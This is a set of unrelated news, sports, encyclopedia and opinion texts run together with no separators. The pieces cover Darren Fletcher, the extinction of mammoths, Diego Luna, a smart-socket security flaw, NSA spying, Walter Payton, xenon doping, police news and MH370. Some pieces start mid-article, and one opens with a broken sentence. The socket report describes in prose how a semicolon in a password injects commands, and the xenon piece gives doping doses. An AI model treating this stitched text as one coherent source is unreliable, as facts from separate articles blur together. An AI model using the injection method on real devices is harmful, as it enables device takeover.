He scored another goal, had three assists and completed a respectable 78.2% of his passes during the campaign. When you take into account that he's playing for Pulis, who doesn't bring a possession, passing, or attack-minded philosophy with him, those are very respectable statistics.
With his play and mindset that he has brought to West Brom, Fletcher has been a regular in regards to wearing the captain's armband and very few are going to complain about that decision. His influence on the squad, although obvious in quality, cannot be quantified with any amount of analytics.
Fletcher has brought with him the mindset that his former manager, Sir Alex Ferguson, instilled in him during his time under his fellow Scot. This is something that the Baggies faithful have recognised and are rightly thankful for.
Fletcher has been named the captain and the Player of the Year in his first two years for his current club and is not someone who should soon be forgotten.
His legacy with Manchester United is remembered to this day, and likely far into the future, with fondness by those who were lucky enough to see him play for the Red Devils.
Those same supporters, and all the ones paying for entrance at The Hawthorns now, will certainly be able to agree on one point; Darren Fletcher is etching his name solidly into the West Bromwich Albion history books.
Main Photo:
The last of the wooly mammoths likely lived and died on an isolated island.
Related Content What Appears to Be a Complete Mammoth Skeleton Was Discovered in an Idaho Ditch
Researchers recently completed sequencing the wooly mammoth's genetic code and are using the data to piece together clues as to how the creatures went extinct. By comparing DNA samples from different specimens, scientists determined that the last mammoths likely lived on Wrangel Island, a Russian territory in the Arctic Ocean, according to a new study in Current Biology.
Wooly mammoths were about the same size as modern African elephants, but covered in thick brown hair and enormous tusks. The first appeared about 700,000 years ago in Siberia and spread throughout North America and northern Eurasia. A tooth sample found on Wrangel Island is one of the most recent wooly mammoth remains found to date and is about 4,300 years old.
The island separated from the Russian mainland about 12,000 years ago by rising sea levels, taking a group of mammoths along with it. But by that time, according to the fossil record, mammoth populations were already starting to die off.
“We don't know why,” Love Dalen, the senior author of the report and an associate professor of biology at the Swedish Museum of Natural History in Stockholm, told Nicholas Bakalar for the New York Times. “Human hunting, changes in the environment, warming of the temperatures. But it happens everywhere — that's for sure — and at the same time.”
By comparing DNA taken from a 4,300 year-old mammoth tooth found on Wrangel Island with that of a 45,000 year-old soft tissue sample found in northern Siberia, the researchers discovered that there had been two massive die-offs before the last mammoths went extinct. Wooly mammoths had already survived a massive die-off about 300,000 years ago; it took the species around 100,000 years to recover. After the second die-off, about 12,000 years ago, the survivors numbered in the hundreds, according to Reuters. The Wrangel Island mammoths likely survived for about 6,000 years after the mainland mammoths died out. Dalen's group also found that the Wrangel Island mammoth population's isolation was severely inbred, which likely contributed to their extinction.
However, there's an interesting twist to this discovery: because the researchers sequenced the genomes of several individual mammoths, it might be possible to resurrect the species, something ethicists and researchers have been arguing about for a long time now.
But whether or not wooly mammoths roam the Siberian tundra again, spare a thought for the loneliness of those last beasts in the middle of the Arctic.
Luna and the second or maternal family name is Alexander. This name uses Spanish naming customs : the first or paternal family name isand the second or maternal family name is
Diego Luna Alexander ( Spanish pronunciation: [ˈdjeɣo ˈluna aleksanˈdeɾ]; born December 29, 1979) is a Mexican actor, director, and producer. He has appeared in many films, including Y tu mamá también, Milk, Rudo y Cursi, and Rogue One: A Star Wars Story. He is one of the founders and owners of Canana Films.
Early life [ edit ]
Luna was born in Toluca and raised in Mexico City. His mother, Fiona Alexander, was a British costume designer, of Scottish and English descent.[1][2][3] She died in a car accident when Luna was two years old.[4] His father, Alejandro Luna, is a theater, film, and opera set designer, who reinforced the importance of theater and the arts in his life. Alejandro would bring Diego to the sets and mentor him in different aspects of art, cultivating a desire to become an actor and uphold the family tradition.[5]
Career [ edit ]
After starring in many telenovelas, Luna and Gael Garcia Bernal now own Canana Films (which with Tom Golden's Golden Phoenix Productions, produces a number of television documentaries about the unsolved murders of three hundred women in Ciudad Juárez).[6] In 2012, Luna directed his first film, the biopic Cesar Chávez, about the eponymous founder of the United Farm Workers.[7] In March 2015, he joined the cast of Ana Lily Amirpour's film The Bad Batch.[8] Luna became a member of the jury for the Un Certain Regard section of the Cannes Film Festival.[9] In Rogue One, he played Cassian Andor, the ally of Jyn Erso (Felicity Jones).
Luna gained greater recognition with American audiences while starring as Mexican drug cartel leader Miguel Angel Felix Gallardo in the Netflix series Narcos: Mexico, which premiered in November 2018.
Personal life [ edit ]
Luna married Camila Sodi in February 2008; they were divorced in March 2013.[10] They have two children: Jerónimo (b. August 12, 2008),[11] and Fiona (b. July 1, 2010), named after Luna's mother.[12]
Luna and García Bernal co-founded Ambulante A.C., an organization and film festival working to bring documentary films to recommended places.[13] The organization received the prestigious Washington Office on Latin America's Human Rights Award in 2011.[14] In January 2015, Luna appeared at the Board of Directors and narrated a video about the obstacles faced by children migrating from their home country and seeking refuge in the US.[15][16]
Filmography [ edit ]
Film [ edit ]
Television [ edit ]
Music videos [ edit ]
Awards [ edit ]
Image: Bitdefender
Smart electrical sockets might launch the next cyberattack, or might even put your life in danger. Security researchers at Bitdefender have found a vulnerability in a popular brand—the researchers did not disclose which—that they say could allow an attacker to turn power outlets into botnets, read your email, and even set your house on fire if you connect an appliance that could overheat.
The vulnerable socket plugs into a regular one, and allows users to schedule the activity of any dumb electronic device, with the help of a smartphone. The app is available for both iOS and Android platforms, and there have been over 10,000 downloads from Google Play alone. Bitdefender contacted the smart socket vendor, and they've promised to release a fix during Q3 2016.
Among the most destructive actions someone could perform is to wipe the existing software on the socket and to replace it with malicious one, researchers said.
"Up until now most IoT vulnerabilities could be exploited only in the proximity of the smart home they were serving, however, this flaw allows hackers to control devices over the Internet," Alexandru Balan, chief security researcher at Bitdefender, said. "This is a serious vulnerability, we could see botnets made up of these power outlets."
So a squad of hacked smart sockets might be the next security problem the Internet of Things industry witnesses. This comes after we've already seen CCTV cameras turned into zombies, and we're getting ready for the zombie toaster army.
Researchers who analyzed the power outlet have found several security issues. The device comes with a weak username and password combination, and does not alert users to change it. Experts have also noticed that, during configuration, the app sends WiFi credentials in clear text over the network.
"For users, the consequences can extend to losing control of all their network-connected devices as they become weapons of attack in a cyber-criminal network"
In addition, when the device communicates with the app, the information passes through the vendor's servers unencrypted. It's only encoded, a process that's easily reverse engineered.
Researchers have also discovered that attackers could take advantage of a feature that allows the device to send emails to the user every time it switches on and off.
Bitdefender outlines two possible attacks, which the company tested in an environment similar to the common home.
They say hackers can compromise the email account of the user, if two-factor authentication is disabled. Attackers have to know the MAC address of the device and the default password. With that, they can reschedule the smart socket, or access all the information the device come into contact with, including email credentials.
Another hack that can be performed requires a little bit of coding. When typing a password, the ";" symbol can be misinterpreted as the end of a command. Someone might use this to their advantage, and instead of typing a password, they might type instructions for the device to perform a malicious action. Usernames and passwords should be stripped of characters such as commas or semicolons, in order to prevent command injections.
"When an attacker exploits this flaw, the commands specified in the new password overwrite the root password and can open the embedded Telnet service. Using Telnet, an attacker, regardless of his location, can send commands to stop/start/schedule the device, as well as to execute rogue commands, including running malicious firmware to achieve persistence or using the device to perform attacks on other computers or devices inside the local network," Bitdefender said in a paper.
"For users, the consequences can extend to losing control of all their network-connected devices as they become weapons of attack in a cyber-criminal network, as well as to exposing their email accounts and their contents," security researcher George Cabau said.
The research was carried out by Cabau together with infosec professionals Dragos Gavrilut and Radu Basaraba.
from Green Is The New Red
The National Security Agency is engaged in an extensive monitoring of real-time and stored communications of Americans as part of an information-sharing program with Google, Facebook, and other major internet companies. Glenn Greenwald broke the story at The Guardian yesterday based on top-secret documents on a program called PRISM. If you haven't read his story, or the Washington Post coverage, please do.
What we are seeing now–especially news that NSA is collecting Verizon customer information– is strikingly similar to the scandal over illegal spying by the Bush administration. But as Greenwald shows, these operations have not only continued under the Obama administration, they have expanded.
In light of that, I wanted to highlight a little-known story of how the NSA narrowly averted a similar scandal involving illegal spying on protest groups in 2006.
At that time, members of the Earth Liberation Front were going to trial, as terrorists, for their role in a series of arsons. The threat of a life sentence was enough to convince them to snitch on their friends. A few of the defendants refused, though, and were facing even more prison time for not cooperating.
Then the attorneys for these non-cooperating defendants had a brilliant idea. On March 24, 2006, they served prosecutors with a request for all materials obtained through the Foreign Intelligence Surveillance Act (FISA) or the NSA. The Bush administration NSA scandal was international news. And if the NSA was illegally spying on environmentalists, it could have all the cases thrown out of court.
Here's an excerpt from Green Is the New Red about what happened next:
On August 22nd, after months of government stalling, Judge Ann Aiken holds a hearing on the NSA motion. Prosecutors argue that they have turned over all of the discovery materials in the case, including seventy-two CDs and 28,000 pages of documents. They say no information “in the possession” of the prosecution was obtained illegally. If they ever received materials obtained through warrantless surveillance, they say they had no way of knowing and no security clearance to find out. Attorney Stephen Peifer tells Aiken, “I've been working on this case for ten years, and the term FISA has never come up.” “To you,” Aiken replies. In another case, assistant U.S. attorneys were unaware of NSA spying until the government accidentally disclosed it to defense attorneys for the Al-Haramain Islamic Foundation. Information obtained through warrantless surveillance could have been ﬁltered into the Operation Backﬁre investigation unbeknownst to prosecutors. There is only one way to know for sure. In a major victory for the defense, Aiken rules that the government must disclose whether the NSA spied on the defendants. The ruling does not bode well for the prosecution. A group of constitutional scholars, law professors and former government oﬃcials has sent a letter to Congress saying that, although not all details of the spying program have been revealed, it “appears on its face to violate existing law.” The Congressional Research Service, the nonpartisan investigative arm of Congress, has issued a report with similar conclusions. In at least ﬁve other lawsuits, courts have forced the government to disclose whether NSA surveillance played any role in the case; on the morning McGowan's attorney ﬁled the motion, another court ruled that NSA surveillance violated the First Amendment, Fourth Amendment, and the Foreign Intelligence Surveillance Act. “It was never the intent of the Framers to give the president such unfettered control,” Judge Anna Diggs Taylor wrote in ACLU v. NSA, “particularly where his actions blatantly disregard the parameters clearly enumerated in the Bill of Rights.” If NSA surveillance is disclosed in this case, it will likely be ruled unconstitutional. And if it is ruled unconstitutional, then all of the Operation Backﬁre cases could be dismissed. But the government could lose more than these cases. The Bush administration has fought hard to keep its spy programs secret. When the Justice Department's Oﬃce of Professional Responsibility began examining the role of government lawyers in the program, President Bush denied security clearances to investigators and shut them down. In an interview with the El Paso Times, National Intelligence Director Mike McConnell stated that to even question government spying threatens American lives. “So you're saying that the reporting and the debate in Congress means that some Americans are going to die?,” the interviewer said, repeating McConnell's statement. “That's what I mean,” he replied. “Because we have made it so public. We used to do these things very diﬀerently, but for whatever reason, you know, it's a democratic process and sunshine's a good thing.” If prosecutors hand over new information about the Terrorist Surveillance Program, it could prove suspicions that the government's spying has extended far beyond Al Qaeda. It could lead to Congressional hearings, much like ones that dissolved SHAMROCK, MINARET, and COINTELPRO. Exposing NSA spying on the animal rights and environmental movements could dismantle the entire domestic spying apparatus, and the Bush administration along with it. Two months later, Daniel McGowan's attorney, Amanda Lee, quietly withdraws the NSA motion. Neither she nor Assistant U.S. Attorney Kirk Engdall will oﬀer an explanation other than that it is “by reason of agreement with the government.” A week later, on November 9th, Daniel McGowan, Jonathan Paul, Nathan Block and Joyanna Zacher change their pleas to guilty. The pleas are part of an unusual non-cooperating plea agreement in which they will admit their guilt but not name names. Neither the government nor defense attorneys will conﬁrm a direct relationship between the withdrawal of the motion and the guilty pleas. But it is clear that both parties had a remarkable change of heart on positions they previously refused to compromise. From the start prosecutors had said there were two options: snitch and receive a reduced sentence, or go to trial and risk life in prison. McGowan and his attorneys had organized the “non-cooperating defendants” and pushed for a special plea deal, but prosecutors said it was not open for discussion. While this agreement impedes investigation into other ELF crimes, the government avoids a national security investigation. The defendants had been just as steadfast, saying they would never accept a plea deal. Had they maintained this position, and had the NSA motion revealed illegal surveillance, their cases might have been thrown out. However, those are signiﬁcant variables with so much at stake. This way, the defendants relinquish any hope of absolution, but they secure reduced sentences. The defendants' decision comes with an additional, political sacriﬁce. For McGowan, who always seems to be thinking about the bigger activist picture, the deal means forfeiting a rare opportunity to expose systemic government corruption. On some activist websites and message boards there are comments questioning the decision to cede the upper hand in a national political scandal. The anonymous individuals leaving comments, however, are not facing life in prison.
Advertisements
Who is Walter Payton?
Walter Payton was one of the top running back prospects in Mississippi coming out of high school but was not offered any scholarships by any teams in the SEC, as they offered very few African Americans scholarships during that time. He was offered a scholarship with Kansas State and had accepted but ultimately decided to stay in Mississippi and attend the primarily black Jackson State University. Payton had a very successful collegiate career where he set school records in career touchdowns and touchdowns in a season. in 1973 and 1974, he was the winner of the Black College Player of the Year as well as being named to the All-American Team in 1974. His college years would be where he earned the nickname “Sweetness” for his personality and demeanor as well as his aggressive running style. In 1975, Walter Payton was selected 4th overall by the Chicago Bears, where he would begin his legendary career.
NFL Career
Sweetness was and is one of the greatest, if not the greatest, running backs to ever play the game. In just his second season, he was selected to his 1st Pro Bowl after rushing for 1,390 yards and 13 touchdowns. He was also named the Pro Bowl MVP that season. In just his third season, he exploded for more than 1800 yards and 16 touchdowns. It was also this season that he broke the record for rushing yards in a game with 275, previously held by OJ Simpson. That record setting game was the football version of Michael Jordan's “flu game” as Payton played this game with the flu and a 101 degree fever. That record stood for 23 years before being broken.
Though Payton was one of the best running backs in the NFL at the time, the Bears struggled and only managed to make the playoffs twice in Payton's first 7 years. In 1982, the Bears brought in another soon to be legend to coach the team, Mike Ditka. In 1984, Payton would break Jim Brown's career rushing yard record of 12,312 yards. That season, Sweetness would rush for 1500 yards and lead the Bears to the second best offense in the league. It was also this season the Bears would showcase one of the best defenses of all time, allowing a record setting low in points against.
With the momentum of the 1984 season, Payton and the Bears would roll to a 15-1 season and win Super Bowl XX by crushing the New England Patriots 46-10. This year would also be the year that we all became witness to greatness….the Super Bowl Shuffle. The greatest music video of all time, starring many members of the Super Bowl winning Chicago Bears, to include Walter Payton.
Just two years after his Super Bowl win, Walter Payton would retire in 1987. At the time of his retirement, he was the NFL career leader in rushing yards with 16,726 as well as rushing touchdowns with 110. The career rushing yards record would later be broken by Emmitt Smith and the career rushing touchdowns record would be broken by Marcus Allen, LaDainian Tomlinson, and Emitt Smith. Payton is also the Bears franchise record holder in total touchdowns, net total yards, rushing yards, rushing attempts, rushing touchdowns, and amazingly, receptions. His jersey number, 34, was retired by the Chicago Bears and he was elected into the Pro Football Hall of Fame in 1993.
Life and Death After Football
Payton is one of Chicago's most beloved athletes, however, a biography written by Jeff Pearlman painted Payton as a very pained and miserable individual. He was a heavy user of pain killers and alcohol to try to manage the pain from many years of abuse as an NFL running back. It was also said that he was not the happy person that many people knew. He had a hard time coping with life after football and battled depression, boredom, loneliness. Things did not get better for Walter. In February of 1999, amid many rumors of massive weight loss, Payton held an emotional press conference to inform everyone that he had rare autoimmune liver disease known as primary sclerosing cholangitis. Without a liver transplant, things looked very bleak for Walter. He never received a new liver and it is believed that this rare disease led to his bile duct cancer. By November of 1999, just 9 months after he held his press conference, Walter Payton passed away. He was just 45 years old. A piece of Chicago died that day.
It's not all heartbreak for the city of Chicago and the Bears though. Walter Payton inspired many around him and he also inspired the city of Chicago in his death. His death brought attention to the need for organ donor's nationally. Chicago organ donation volunteers spiked by 13,000 people after Payton's announcement. The state of Illinois even created a special license plate where the profits were donated to organ donation programs in Illinois.
It was a heartbreaking moment for Chicago, but Walter Payton will be in the hearts of Chicago and the NFL for years to come.
I want to thank the Chicago Bear's Subreddit for their help with this article. Here are a few more moments of heartbreak Bear's fans have experienced.
Reddit user chigoose22 – The back-to-back 50 burgers to the Patriots and Packers in 2014. The team had clearly no fight left in them.
Reddit user 11up11 – Playoff loss to the Redskins in 1988. Sweetness' last game as a Bear. Broke my heart.
Reddit user Adipost1 – This –> https://youtu.be/OSHhohzylpk
Reddit user beardown858585 – Caleb Hanie throwing a pick 6 to Bj Raji in the 2010 NFC championship
Reddit user Angry_Caveman_Lawyer – When Walter announced he was dying at a press conference. My favorite player growing up looked like a shell of himself. He broke down crying. It was awful. And a couple months later he was gone.
Reddit user suckmyfatfuckinballs – Where do I begin? Holy shit. Being a Bears fan is tough, but I love them too damn much. With that said… I'll say a painful one that no one else has said. To me this is genuinely the most frustrating game I've ever watched that's non Packer or Super Bowl related. Week 13 2013 @ Vikings. The Bears started out strong, Alshon was having the game of his life. He was just catching everything coming his way. Pretty sure we lead 13-0 at one point (I try my best to repress this game from my memory). Peppers concuss Ponder and then steps in Matt fucking Cassel who some fucking how leads the Vikings to a comeback. Suddenly the score is tied 13-13. The Bears eventually score a touchdown to capture the lead. Then the Vikings, led by Matt fucking Cassel mind you, from their own stupid ass fucking 1-yard line on 4th fucking down convert and effortlessly march their stupid purple fucking asses into their endzone to tie the fucking game up into god damn stupid fucking overtime. HOW??? Sorry, but typing and reliving all of this again is getting me heated. So the game gets to overtime. Things are looking shitty at first, but luckily Blair Walsh misses a field goal (bet you've never heard that before). The Bears get the ball, they march their way down the field. Trestman decides to kick a field goal on 2nd down. Robbie Gould, who's easily a top 3 NFL kicker at the time, and most likely a Pro Bowl front runner, misses a usual would be chip shot 30 something yard field goal. This game was the start of Robbie's demise. He's never quite been the same since that. He easily went from top 3 kicker to like 8th best kicker after that game. He literally kicked his way out of the Pro Bowl. Vikings get the ball back and Walsh kicks the game winner. The sad part is if we would've won that game, 4th and 8th would've never happened. We wouldn't be playing the Packers in week 17 for the division, because we already would have clinched the NFC North at that point. I knew this game would bite us in the ass at the end, and sure enough my pessimistic ass was right. The 2013 season as a whole was frustrating for many reasons. 2014? The melancholic pitiful season of lost hope. 2016? WR Corpse is more like it. But 2013? 2013 was fucking infuriating. So much potential ruined by Emery's, Trestman's, and Tucker's incompetence. The Bears should have been a playoff team and shouldn't have lost the games they did. 50 point asses beating by Eagles, getting swept by the Lions, getting destroyed by the Rams, 4th & 8, and the game I just mentioned. For the talent and chemistry the team had at the time, we should have been at least a 9 win playoff team. TL;DR: If we never lost to the Vikings the in 2013, 4th & 8 would've never happened.
Want to experience more heartbreak? Check out the past moments of heartbreak.
Atlanta Falcons – Super Bowl LI
Arizona Cardinals – Super Bowl XLIII
Baltimore Ravens – 2011 AFC Championship Game
Buffalo Bills – Music City Miracle
Carolina Panthers – Super Bowl 50
XENON is one of the shyest members of the periodic table of the elements. Chemically, it is almost inert, and physically, it makes up only 0.000009% of the atmosphere, so it is not surprising that it was among the last of the naturally occurring elements to be identified, in 1898. Biologically, however, it is not shy at all. In some countries, notably Russia, it is used as an anaesthetic. It is also known to protect body tissues from the effects of low temperatures, lack of oxygen and even physical trauma. In particular, it increases levels of erythropoietin, also known as EPO, a hormone that encourages the formation of red blood cells.
Xenon's protective and EPO-boosting properties mean it is being investigated as a treatment for babies whose brains have accidentally been starved of oxygen during birth, and of adults who have had heart attacks. But it is also, in Russia, being used as a way to improve athletic performance.
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks.
Xenon works its magic by activating production of a protein called Hif-1 alpha. This acts as a transcription factor: a chemical switch that turns on production of a variety of other proteins, one of which is EPO. Artificially raising levels of EPO, by injecting synthetic versions of the hormone or by taking so-called Hif stabilisers (drugs that discourage the breakdown of Hif-1 alpha), is illegal under the rules of the World Anti-Doping Agency (WADA). Other methods of boosting the hormone, however, are permissible—and that fact has not gone unnoticed by the Russian sports authorities. Athletes are allowed to live or train at altitude, or sleep in a low-oxygen tent, in order to stimulate red-cell production. If xenon treatment is merely replicating low-oxygen environments by replacing oxygen with xenon, then its use to enhance athletic performance is permissible.
The use of xenon by athletes certainly has government blessing. A document produced in 2010 by the State Research Institute of the Ministry of Defence sets out guidelines for the administration of the gas to athletes. It advises using it before competitions to correct listlessness and sleep disruption, and afterwards to improve physical recovery. The recommended dose is a 50:50 mixture of xenon and oxygen, inhaled for a few minutes, ideally before going to bed. The gas's action, the manual states, continues for 48-72 hours, so repeating every few days is a good idea. And for last-minute jitters, a quick hit an hour before the starting gun can help.
The benefits, the manual suggests, include increasing heart and lung capacity, preventing muscle fatigue, boosting testosterone and improving an athlete's mood. Similar benefits have been noted in papers in Russian scientific journals, and in conference presentations describing tests of xenon on mountain climbers, paddlers, soldiers and pilots.
And the gas appears to have been used in past Olympics. The website of Atom Medical Centre, a Russian medical-xenon producer, cites national honours the company received for its efforts in preparing athletes for the 2004 summer Olympics and the 2006 winter games.
Something the published Russian reports do not go into, however, are measurements of EPO or Hif-1 alpha. Yet animal studies elsewhere have demonstrated xenon's dramatic effects on both. One such, carried out in 2009 by Mervyn Maze at Imperial College, London, found that exposing mice to a mixture of 70% xenon and 30% oxygen for two hours more than doubled the animals' EPO levels a day later. Another, by Xiaoqiang Ding of Fudan University in Shanghai, found that Hif-1 alpha levels in mice stayed high for up to 48 hours after treatment. By contrast, mice put in a low-oxygen enclosure saw an EPO increase that lasted less than two hours.
Similar physiological effects may take place in people. In healthy adults, two hours in a low-oxygen chamber raises EPO levels by 50%, and the effect disappears (as in mice) within a few hours. The Russian manual indicates, by contrast, that xenon's benefits last for days—as might be expected if they were caused by the sort of Hif-1 alpha response seen in mice.
Whether xenon treatment will pass muster if and when WADA scrutinises it remains to be seen—and will no doubt depend on the finer points of the gas's biological action, many of which are still muddy. In the meantime, sports trainers around the world might be tempted to follow Russia's example, and reap xenon's benefits before the regulators catch up.
2017 linebacker Justin Foster (6-3, 225, Shelby, NC Crest) is considered one of the top linebackers in the country for next year and he has three teams at the top, with the Florida Gators are looming in that group as well.
“Clemson, Tennessee and Oklahoma are the teams standing out to me right now,” Foster said. “I went down to Florida this fall but I plan to get down there soon to check them out again. I want to talk to the coaches there some more.”
Foster is good friends with Florida Gators defensive end Jonathan Bullard and Bullard is telling the linebacker a lot about Florida and Randy Shannon.
“Randy Shannon is the coach that's recruiting me for Florida,” he said. “It's great to be recruited by him because he's a great linebacker coach. Jon Jon [Bullard] has told me a lot about him. He says that he's a great coach but I don't really know him that well.”
The Gators haven't done anything wrong in recruiting Foster, there are just two other schools are just talking to the Crest linebacker more.
“Clemson and Tennessee are recruiting me harder than anyone,” Foster said. “They talk to me almost everyday and then inbox me and stuff like that. They're getting me to call them and stuff.”
Florida does have Bullard in their corner and he's trying to get Foster to visit the Gators again to see what campus is like for himself.
“When Jonathan comes home he just says things about Florida to me,” he said. “He told me not to forget about the Gators and to make sure and check them out for a visit. He says to make your own decision though.”
Foster didn't grow up a fan of the Florida Gators but when Bullard made it down to Gainesville, the linebacker started pulling for the Orange and Blue.
“I wasn't big on Florida until Jon went there but now he's down there and he's doing great,” Foster said on Bullard's impact. “That helps Florida out some when it comes to making my decision.”
INSIDERS TAKE: Foster says he will take a visit to Florida for junior day and also hopes to visit Alabama for a junior day this spring. Clemson is the leader here but the Gators could turn the heat up on the linebacker soon.
NOPD officer collapses, dies while working on Bourbon Street
Image: WWLTV
NEW ORLEANS (WWLTV) - A New Orleans Police officer died while working overnight on Bourbon Street, according to the New Orleans Police Department.
Officer Bryan Bordes, 43, was working on Bourbon Street when he became ill, police said. Bordes collapsed and died on his way to get treatment.
"He complained to his partner that he had begun to feel ill," said NOPD Superintendent Michael Harrison. "He noticed he was having some stomach aches, and very suddenly became very ill. Before we could even get him to medical attention which he requested, he collapsed on Bourbon Street."
According to Bordes' partner, it appeared the officer suffered a seizure, said Harrison.
"When EMS got there, which was within a couple of minutes, and brought him to an ambulance, he actually expired before he made it to the hospital," Harrison said.
The police chief added that doctors worked on Officer Bordes for 45 minutes.
Bordes joined the NOPD in August of 1997 and had worked in the 8th District since February 2006.
"Officer Bordes died this morning doing what he loved doing, and that's serving the citizens of New Orleans,'' Harrison said.
Harrision added that when he spoke with Ofc. Bordes' family, they did not speak of any medical conditions he could have had.
The exact cause of death is unknown, and the Orleans Parish coroner will conduct an autopsy to determine the final cause.
Though his death appears to be of natural causes, it follows on the heels of other recent officer deaths in the line of duty.
NOPD Officer Natasha Hunter died June 8 from injuries suffered after being struck inside of a police vehicle when it was struck by a car, believed to have been driven by a drunk driver.
The death also comes nearly a year after the shooting death of NOPD Officer Daryle Holloway, who was shot and killed allegedly by a suspect he was transporting.
Just a week ago, Jefferson Parish Sheriff's Deputy David F. Michel, Jr. was shot and killed while attempting to stop a suspect in Harvey.
Where does the fire department send their hoses when they're past their prime for fighting fires? Just head to Westminster Pier Park and see for yourself.
An urban beach featuring beach umbrellas, hammocks and a sandy area was the newest addition to the Westminster Pier Park when it was constructed last spring. Last year's hammocks have been replaced with new hammocks, made of recycled fire hoses from the New Westminster Fire Department.
article continues below
“We have been working with a designer to develop new hammock that's actually made of recycled fire hoses. The webbing is actually made of fire hoses themselves,” said Dean Gibson, the city's director of parks, culture and recreation. “It's providing a novel reuse of something that ordinarily – I don't know what happens to old fire hoses when they are not in fire halls, but we have found a use for them down at our site. “
The hammocks have been custom fabricated from retired fire hoses supplied by New Westminster Fire and Rescue Services.
“Obviously it was easier to liaise with our own city people as opposed to having to go to other places,” Gibson said. “It's kind of a unique little twist on things down there.”
Gibson said the residential grade hammocks installed at the urban beach last year were temporary and never intended to be permanent fixtures in the park.
Visitors to Westminster Pier Park wasted no time in slipping into the new hammocks that returned over the Victoria Day long weekend. The biggest complaint?
“They need more than six hammocks,” one woman said while waiting her turn.
Also returning to the waterfront park is Eats @ the Pier, where park goers will be able to buy food and beverages (and even kites) on good weather days from the May long weekend until the end of September.
A critical identification plate on the Boeing 777 flaperon washed up on the Reunion Island that would tie it to MH370 is missing because of the effect of seawater on the adhesive that bonds it to the structure.
According to a former crash investigator the metal ID plate has almost certainly come away because of the “exposure to seawater.”
So what should have been a simple ID exercise now becomes a time consuming forensic investigation.
World's Safest Airlines
World's Top Ten Airlines
World's Scariest Landing
A Boeing part number (657BB) painted on to the flaperon confirms the object is from a Boeing 777, the Malaysian Deputy Transport Minister said yesterday.
“From the part number, it is confirmed that it is from a Boeing 777 aircraft. This information is from MAS (Malaysia Airlines). They have informed me,” Deputy Transport Minister Abdul Aziz Kaprawi said Friday.
The flaperon, has been sent to Toulouse in France to government laboratories, where the police, crash investigators and Boeing representatives expect to verify if it came from MH370.
Under French law air crashes are treated as criminal investigations and thus led by the police.
Malaysia Airlines MH370 disappeared on March 8 last year with 239 passengers and crew aboard on a flight from KL to Beijing.
Investigators will likely have to disassemble the flaperon to find other ID numbers that will link it to MH370.
Panels will have batch numbers that will almost certainly tie the flaperon to a production run at particular time that were installed on various 777s including MH370.
The 777 that operated MH370 carried the registration 9M-MRO and had a Boeing construction Number 28420 and Line Number 404. Its first flight was on the 14th of May 2002. It had flown 53, 465 hours when it disappeared and had flown 7,525 flights.
Marjorie Cohn, Truthout | January 6, 2019
Copyright, Truthout.org. Reprinted with permission.
Politicians and pundits alike have roundly criticized Donald Trump for stating he will pull our troops out of Syria and cut US forces in Afghanistan by half. James Mattis immediately resigned as secretary of defense, writing in a letter to Trump, “you have the right to have a Secretary of Defense whose views are better aligned with yours.”
As the US military kills civilians in Syria and CIA-led Afghan forces continue to commit war crimes, it appears Trump is doing the right thing in pulling out military troops. But the CIA will remain and grow stronger after the US troops leave. “[A]s American military forces are set to draw down, the role of the Central Intelligence Agency is only likely to grow in importance,” according to The New York Times.
Read more...
CENTENNIAL — Authorities began investigating former Araphoe County Sheriff Patrick Sullivan after a Centennial man called police in September and said “an old guy” was trying to get his roommates back into drugs and had been smoking methamphetamine with them, according to a police report.
When the Centennial man asked Sullivan to leave and said he was going to call 911, Sullivan told the man “If you want the police I am the police,” the man told officers.
Sullivan later told detectives he is on a meth drug task force and helps to recover addicts get clean, according to another report. He also said he worked for the state health department's drug treatment office.
When police interviewed the three roommates, one of them said Sullivan has power of attorney for him. The 34-year-old man also said Sullivan cashes the man's Social Security checks, gives him cash from them, and takes the man shopping when needed.
A spokesman for the Colorado Department of Public Health and Environment said this afternoon there is no record of Sullivan working there, or of the department having a meth treatment program.
The reports give the first insight into how a well respected, longtime law enforcment icon came to be standing before a judge this morning facing drug charges.
After a brief huddle with a prosecutor and defense attorney, a Judge William Sylvester this morning doubled Sullivan's bond from $250,000 to $500,000.
Prosecutor Karen Pearson would not comment on why she sought to increase the bond and Sylvester offered no explanation. He issued a mandatory protection order preventing Sullivan from having contact with any potential witness in the case.
An investigative report filed in court in support of Sullivan's arrest says officers from the South Metro Drug Task Force, including Arapahoe deputies, used confidential informants and audio and video surveillance in the investigation.
According to the court papers:
After a complaint in early October to the Arapahoe sheriff's office that an “unwanted party” was at a home in Centennial, a deputy arrived and identified the person there as the former sheriff.
Agent Matt Hanagan of the drug task force was brought in to the case and asked two confidential informants who worked with the task force whether they thought they could purchase methamphetamine from Sullivan. Both of them said they had engaged in sex acts with Sullivan in the past and said they would be willing to ask him for meth in exchange for a sex act.
After several phone calls and text messages, Sullivan agreed to meet one of the men at an Aurora home and bring meth to exchange for sex.
Officers set up audio and video surveillance at the house and, Tuesday afternoon, Sullivan arrived and was seen to hand suspected meth to the informant.
He was taken into custody and officers found additional suspected meth — a total of 0.7 grams.
Sullivan was booked into the jail that bears his name on a charge of unlawful distribution, manufacturing, dispensing or sale of a controlled substance. The Class 5 felony carries a penalty of up to six years in prison.
During this morning's brief hearing, Judge Sylvester asked Sullivan if he had any questions, and Sullivan said no. He kept his head down and leaned on a cane through the proceedings. He was handcuffed and wore an orange jail jumpsuit. No members of his family appeared to be in the courtroom.
Sullivan's attorney, Kevin McGreevy, declined to comment.
Sullivan is being held in the Patrick J. Sullivan Jr. Detention Facility. He was sheriff from 1984 until his retirement in 2002.
Sullivan retired from law enforcement to become director of safety and security for Cherry Creek Schools in 2002, retiring from there in 2008.
Former Arapahoe County Commissioner Jim Dyer, who was not on the commission when Sullivan was sheriff, said Tuesday night he was shocked when told of the sheriff's arrest.
“I knew he had a distinguished career,” Dyer said. “I think he was a good guy. That's shocking. I am absolutely astounded.”
Steve Ward, a former county commissioner who worked with Sullivan, said he “couldn't be more shocked.”
Former Arapahoe County District Attorney Jim Peters, who worked with Sullivan, said the allegations against the former sheriff are “totally out of character” for the man he knew and are “hard to believe.”
“He was completely ethical, upright and honest,” Peters said. “He just oozed honesty and integrity. He was an outstanding sheriff.”
Carlo Illescas: 303-954-1175 or cillescas@denverpost.com.
